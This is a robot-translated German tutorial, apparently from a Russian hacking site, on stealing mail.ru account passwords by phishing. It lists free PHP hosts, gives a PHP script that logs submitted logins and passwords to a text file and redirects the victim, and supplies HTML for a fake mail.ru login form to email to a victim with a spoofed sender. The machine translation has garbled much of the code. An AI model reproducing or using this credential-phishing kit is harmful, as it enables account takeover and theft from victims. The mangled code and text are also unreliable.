This page has been robot translated, sorry for typos if any. Original content here.

Hacking Mail auf mail.ru [SI]

[::. INTRO. ::]

Hallo! In diesem Artikel werde ich darüber sprechen, wie man ein Postfach auf dem kostenlosen Postdienst mail.ru hackt.

Der Artikel richtet sich an Anfänger, sowohl an die SI als auch an Internetbenutzer, die auf das Konto einer anderen Person zugreifen möchten.

Aber okay, darüber werde ich noch lange nicht schreiben und es ist klar "warum ein Postfach für einen Cracker notwendig ist, wirst du verstehen.

Der Artikel passt für Anfänger. Guru bitte nicht lesen :)

[::. VORBEREITUNG. ::]

Zunächst benötigen wir ein kostenloses (besser bezahltes) Hosting mit PHP- Unterstützung.

* Stellen Sie einfach sicher, dass das Hosting PHP unterstützt

Sie können sich auf einem der folgenden Länder registrieren:

 nextmail.ru 
 hobby.ru 
 webrise.ru 
 lapin.ru 
 free.dl-hosting.ru 
 hostow.net 
 beplaced.ru 
 777host.ru 
 paltus.ru 
 miraclehost.ru 
 freebox.ru 
 alfaspace.net 
 k70.ru 
 hosting.promostudio.ru 
 chat.ru 
 maxhost.ru 
 nixup.com 
 e2e.ru 
 noka.ru 
 newmail.ru 
 boom.ru 
 h15.ru 
 hut.ru 
 jino-net.ru 
 pochta.ru 
 unlimhost.ru 
 onepage.ru 
 by.ru 
 sbn.bz 
 yard.ru 
 domainhosting.ru 
 orthodoxy.ru 
 webservis.ru 
 ru-web.net 
 activehost.ru 
 househost.ru 
 bestof.ru 
 addr.ru 
 hosting.dump.ru 
 pesni.ru 
 medbox.ru 
 fatal.ru 
 x5x.ru 
 hopshot.com 
 5gigs.com 
 wagoo.com 
 orgfree.com 
 awardspace.com 
 bobos.ca 
 www.host.sk 
 zportal.info 
 spaceall.de 
 3x.ro 
 sretenie.ru 
 dotgeek.org 
 sevhosting.net 
 o2g.net
 www.jino-net.ru
 www.nixup.com
 newmail.ru
 ho.com.ua
 wallSt.ru
 hut.ru
 holm.ru
 e2e.ru
 fatal.ru
 host.sk
 ut.ru
 H1.ru
 Hostmos.ru
 Webm.ru
 Rdcom.ru
 narod.ru
 front.ru
 nm.ru 
 chat.ru 
 boom.ru 
 by.ru

Registriert? - Lass uns weiter gehen!

Was brauchen wir?

Zuerst benötigen wir einen Sniffer (dies ist ein Skript, mit dem Sie die empfangenen Daten in einer Textdatei speichern können).


PHP-Code:
  <? php
 
  $ f = fopen ( "mail.txt" , "at" );
  # Datei, wo Flock gespeichert werden soll ( $ f , 2 );
  fputs ( $ f , $ _GET [ 'Login' ]. "@" );
  # login fputs ( $ f , $ _GET [ 'Domain' ]);
  # domain fputs ( $ f , ";" . $ _GET [ 'Passwort' ]. "\ n" );
  # password flock ( $ f , 3 );
  fclose ( $ f );
  ?> <script> document.location.href = "/click?http://win.mail.ru/cgi-bin/readmsg?id=121112312"; </ script>

Betrachten Sie das Skript ausführlicher.


PHP-Code:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>

Diese Zeile gibt den Ort an, an dem wir den Benutzer nach der Autorisierung auf die Brieffälschung umleiten.

  • Wir speichern mes.php in der Datei und füllen sie mit Hosting aus.
  • Erstellen Sie außerdem die Datei mail.txt im Verzeichnis mit dem Skript und fügen Sie es auf der rechten Seite (chmod) 777 ein.

Vielleicht mit Hosting - alles!

Fahren wir mit genau dem Brief fort, den wir dem Opfer auf Seife schicken werden.


Code des Briefes:
  < table class = readlet cellpadding = 0 cellspacing = 0 border = 0 width = "100%" > < tr >
 
  < td id = aj_body >
 
  < div id = let_body > < base href = "http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg" >
 
  < table cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < tr >
 
  < td > Der Benutzer hat Ihnen einen versteckten Brief gesendet . <br> Um die E-Mail anzuzeigen, geben Sie Ihren Benutzernamen und Ihr Passwort ein . <br> </ a > </ p > </ td >
 
  </ tr >
 
  </ table > < font color = 00 ;
  33 ;
  66 FACE = "Arial" >
 
  < h4 > Autorisierung </ h4 >
 
  </ font >
 
  < table cellpadding = 0 cellspacing = 0 border = 0 class = login >
 
  < form method = "GET" action = "http: // Adresskarte /mes.php" >
 
  < input type = "hidden" name = "mail" value = "1" >
 
  < tr >
 
  < td width = 75 >
 
  < img src = http : //img.mail.ru/0.gif height = 1> <br> Name
 
  </ td >
 
  < td width = 150 >
 
  < input type = "text" name = "Login" >
 
  </ td >
 
  < td width = 75 >
 
  < select name = "Domain" >
 
  < option value = "mail.ru" AUSGEWÄHLT > @ mail .
  com </ option >
 
  < option value = "inbox.ru" > @ Posteingang .
  com </ option >
 
  < option value = "list.ru" > @list.
  com </ option >
 
  < option value = "bk.ru" > @ bk .
  com </ option >
 
  </ select >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td >
 
  Kennwort
 
  </ td >
 
  < td >
 
  < input type = "password" name = "Passwort" >
 
  </ td >
 
  < td >
 
  <a href="http://www.mail.ru/pages/help/92.html" target = _new> Passwort verloren ? </ a >
 
  </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < input type = checkbox name = "level" Wert = 1 id = "alien" > < label for = "alien" > Alien Computer </ label >
 
  </ td >
 
  < td > </ td >
 
  </ tr >
 
  < tr >
 
  < td > </ td >
 
  < td >
 
  < input type = "Senden" value = "Login" xstyle = "margin-top: 4px" >
 
  </ td >
 
  < td > </ td >
 
  </ tr > </ form >
 
  </ table > <br> <br>
 
  Um mehr über Dienstleistungen zu erfahren, besuchen Sie <a href="http://corp.mail.ru" target = "_blank"> Corp.
  Mail .
  Ru </ a > <br>
 
  Nationaler Postdienst <a href="http://www.mail.ru" target = "_blank"> @ Mail .
  ru </ a > - die beste kostenlose E-Mail .
 
  < base > </ div >
 
 

Geben Sie im Aktionsparameter das Formular- Tag an - die Adresse Ihrer Site (die Sie oben registriert haben) und den Pfad zum mes.php-Sniffer .

[!] Es ist darauf zu achten, dass die Daten mit einer Methode "GET" übergeben werden! Ansonsten wird nichts davon kommen.

Jetzt bleibt es, dem Opfer einen Brief zu schicken, vorzugsweise mit der Ersetzung der Adresse .

Wir kopieren den Code des Briefes in das Eingabefeld und senden ihn im HTML-Format, nachdem wir zuvor die Felder ausgefüllt haben.

Wenn das Opfer beißt, dann hast du Glück :)

Sie können die Passwörter in der Datei mail.txt finden .

[::. END. ::]

Ich denke alles.

Und wie man sich dem Einbruch nähert, um für Sie zu lösen.

Vielen Dank für Ihre Aufmerksamkeit!

Ich erwarte Ihr Feedback direkt unter diesem Text.

Und es ist besser, nichts zu brechen;)

Auf Wiedersehen und bis bald :)